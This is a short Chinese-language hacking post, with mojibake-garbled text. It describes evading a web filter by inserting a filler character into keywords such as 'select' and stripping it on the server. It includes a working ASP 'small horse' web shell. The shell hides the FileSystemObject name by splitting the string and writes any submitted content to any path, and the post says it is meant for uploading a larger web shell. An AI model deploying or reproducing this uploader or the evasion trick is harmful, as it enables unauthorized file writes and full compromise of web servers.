我們提交select會(huì)被攔截(如無(wú)特別指出,都為post),但是我們提交 s魚e魚l魚e魚c魚t 那就不會(huì)被攔截了
也就是我們?cè)谔峤粫r(shí),將文本內(nèi)容進(jìn)行加密,提交到服務(wù)器后,在進(jìn)行重新解密,這樣就能繞過(guò)一流攔截系統(tǒng)了
一下是一個(gè)自己測(cè)試用的小馬
這個(gè)小馬的缺點(diǎn):由于加密時(shí)是把整個(gè)文本進(jìn)行加密的,所以上傳的文本大小為原來(lái)的3倍,本地測(cè)試時(shí)傳大馬,卡半天
不過(guò)這個(gè)可以增加關(guān)鍵字來(lái)解決,處理文本時(shí)把select等關(guān)鍵字進(jìn)行加密就行了
一點(diǎn)小思路,拋磚引玉 by 3x
<%
on error resume next
if request("path")<>"" then
temp="scrip"&"ting.f"&"ilesyst"&"emobject"
set fso=server.createobject(temp)
response.write request.Form&""
path=request("path")
dama=replace(request("content"),"魚","")
dama=replace(dama,"’","'")
dama=replace(dama,"‘","'")
set f=fso.createtextfile(path,true)
f.write dama
if err=0 then
response.write "成功"
else
response.write "失敗"
err.clear
end if
set f=nothing
set fso=nothing
end if
%>
當(dāng)前路徑 <%=server.mappath(request.servervariables("script_name"))%>
保存路徑